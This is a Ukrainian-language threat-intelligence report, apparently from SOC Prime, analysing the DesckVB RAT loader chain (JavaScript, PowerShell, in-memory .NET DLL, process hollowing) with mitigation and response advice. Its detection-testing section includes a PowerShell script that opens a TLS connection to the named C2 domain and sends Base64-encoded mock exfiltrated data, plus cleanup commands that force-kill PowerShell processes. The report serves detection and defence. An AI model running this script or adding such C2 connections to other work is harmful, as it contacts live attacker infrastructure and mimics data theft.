Аналіз DesckVB RAT: Від завантажувача на JavaScript до безфайлового .NET RAT

Ruslan Mikhalov Керівник досліджень загроз у SOC Prime

Стежити

Аналіз DesckVB RAT: Від завантажувача на JavaScript до безфайлового .NET RAT

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Резюме

DesckVB RAT — це троян, що працює на JavaScript, який перетворюється в завантажувач PowerShell для отримання та виконання файлу .NET DLL без файлової оболонки безпосередньо в пам’яті. Щоб приховати виконання, завантажувач використовує кодування Base64 і зворотню обфускацію рядків, зловживає InstallUtil.exe як LOLBin і створює новий процес, використовуючи CreateProcessA. Після активації RAT встановлює зашифроване C2-комунікацію через HTTPS і підтримує модулі для логування клавіатури, доступу до веб-камери та виявлення антивірусів.

Розслідування

Аналіз показує, що початковий етап JavaScript записує скрипт PowerShell в C:UsersPublic, а потім звертається до обфуcкованого домену для завантаження .NET збірки (наприклад, ClassLibrary3.dll). Збірка завантажує допоміжні DLL, створює суспендований процес і впроваджує код корисного навантаження, повідомляючи про конфігураційні деталі, такі як вторинний шкідливий домен і порт. Телеметрія мережі підтверджує TLS-зашифровані комунікації від інфікованого хоста до інфраструктури C2 нападника.

Пом’якшення

Заблокуйте виконання ненадійних або непідписаних скриптів PowerShell і обмежте використання InstallUtil.exe для неадміністративних або несподіваних процесів. Застосуйте строгий контроль вихідних даних, включаючи інспекцію HTTPS, де це можливо, та фільтрацію репутації доменів для виявленої шкідливої інфраструктури. На кінцевих точках виявляйте використання CreateProcessA із флагом суспендованого процесу та сигналізуйте про шаблони завантаження збірок .NET у пам’ять, характерні для безфайлових ін’єкцій.

Відповідь

Якщо виявлено індикатори, ізолюйте кінцеву точку, зупиніть ланцюжок шкідливого процесу та зафіксуйте знімки пам’яті для аналізу зборок в пам’яті та ін’єктованих областей. Видаліть впроваджені артефакти PowerShell з C:UsersPublic і знищте будь-які пов’язані DLL або залишки завантажувача. Скидання скомпрометованих облікових даних, змініть вразливі секрети і перевірте журнали файрволу/проксі на вихідні з’єднання з перерахованими доменами і портами.

"graph TB %% Class definitions classDef action fill:#ffcc99 classDef tool fill:#99ccff classDef malware fill:#ccffcc classDef file fill:#dddddd %% Nodes loader_js["Інструмент – Назва: Обфускований JavaScript завантажувач Метод: T1027.006 HTML Smuggling Метод: T1027.008 Відсічені корисні навантаження Опис: Використовує Base64 і зворотні рядки для приховування команд"] class loader_js tool powershell_script["Інструмент – Назва: PowerShell Скрипт lkpzw_01.ps1 Метод: T1059.001 PowerShell Опис: Виконується з обхідною політикою виконання"] class powershell_script tool dotnet_assembly["Файл: Шкідлива .NET збірка"] class dotnet_assembly file installutil_execution["Інструмент – Назва: InstallUtil.exe Метод: T1218.004 Виконання через системний бінарний проксі Опис: Виконує .NET DLL через довірену системну бінарну утиліту"] class installutil_execution tool dotnet_reflection["Шкідливе ПЗ – Назва: ClassLibrary3.dll Метод: T1620 Відображуване завантаження коду Опис: Завантажує збірку безпосередньо в пам’ять за допомогою рефлексії"] class dotnet_reflection malware process_hollow["Дія – Метод: T1055.012 Порожня оболонка процесу Опис: Створює підвішений процес і впроваджує шкідливий код"] class process_hollow action thread_hijack["Дія – Метод: T1055.003 Викрадення виконання потоку Опис: Викрадає виконання потоку в цільовому процесі"] class thread_hijack action dll_hijack["Дія – Метод: T1574.001 Виконання потоку захоплення DLL Опис: Завантажує додаткові DLL в пам’ять для розширення функціональності"] class dll_hijack action keylogger_module["Шкідливе ПЗ – Назва: Microsoft.exe Метод: T1056.001 Логування клавіш Опис: Завантажувач кейлогера і інших модулів"] class keylogger_module malware c2_https["Дія – Метод: T1071.001 Веб-протоколи Опис: Спілкується через HTTPS, змішуючись з легітимним трафіком"] class c2_https action %% Connections loader_js –>|записує і виконує| powershell_script powershell_script –>|завантажує збірку| dotnet_assembly dotnet_assembly –>|виконується через| installutil_execution installutil_execution –>|завантажується за допомогою рефлексії| dotnet_reflection dotnet_reflection –>|створює підвішений процес| process_hollow process_hollow –>|використовує викрадення потоку| thread_hijack thread_hijack –>|завантажує додаткові DLL| dll_hijack dll_hijack –>|включає| keylogger_module keylogger_module –>|спілкується з C2| c2_https "

Потік атаки

Описи атаки та команди:
Атакуючий, отримавши початкову опору, запускає PowerShell-навантаження типу “життя-за-рахунок-системи”, яке відкриває TCP-з’єднання з обгорткою TLS до закодованого C2 домену manikandan83.mysynology.net на порту 7535. Навантаження кодує фіктивний блок даних за допомогою Base64 (ілюструючи T1132.002) і передає його через TLS канал. Оскільки використовуються .NET класи PowerShell, жодні зовнішні бінарні файли не записуються на диск, що відображає безфайлову природу DesckVB RAT. З’єднання встановлюється дочірнім процесом (powershell.exe), яке буде фіксуватися Sysmon як подія мережевого з’єднання з точним доменом, портом і прапором TLS, що контролює правило.

Сценарій регресійного тестування:

# --------------------------------------------------------------
# Симуляція C2 комунікацій DesckVB RAT (PowerShell)
# --------------------------------------------------------------
# Параметри
$c2Domain = "manikandan83.mysynology.net"
$c2Port   = 7535

# Підроблене навантаження (Base64 закодоване) – представляє ексфільтровані дані
$payload  = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensor_data=42"))

try {
    # Встановити TCP з'єднання
    $tcpClient = New-Object System.Net.Sockets.TcpClient($c2Domain, $c2Port)
    $netStream = $tcpClient.GetStream()

    # Обгорнути TLS (SslStream)
    $sslStream = New-Object System.Net.Security.SslStream($netStream,$false,({$true}))
    $sslStream.AuthenticateAsClient($c2Domain)

    Write-Host "[+] TLS рукостискання завершено з $c2Domain:$c2Port"

    # Надіслати довжину навантаження (4‑байтний big‑endian) потім дані
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($payload)
    $len   = [BitConverter]::GetBytes([System.Net.IPAddress]::HostToNetworkOrder($bytes.Length))
    $sslStream.Write($len,0,$len.Length)
    $sslStream.Write($bytes,0,$bytes.Length)
    $sslStream.Flush()
    Write-Host "[+] Навантаження надіслано (довжина Base64 $($bytes.Length))"

} catch {
    Write-Error "[-] З'єднання не вдалося: $_"
} finally {
    # Чисте завершення
    if ($sslStream) { $sslStream.Close() }
    if ($netStream) { $netStream.Close() }
    if ($tcpClient) { $tcpClient.Close() }
    Write-Host "[*] З'єднання завершено."
}

Команди очищення:

# Переконайтесь, що всі залишкові NetTCP-з'єднання PowerShell закриті
Get-Process -Name powershell | Where-Object {
    $_.Modules.ModuleName -match 'System.Net.Sockets.TcpClient'
} | Stop-Process -Force

# Опціонально: Видалити Sysmon (якщо це одноразове тестове середовище)
# & "$env:ProgramFilesSysmonSysmon.exe" -u

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно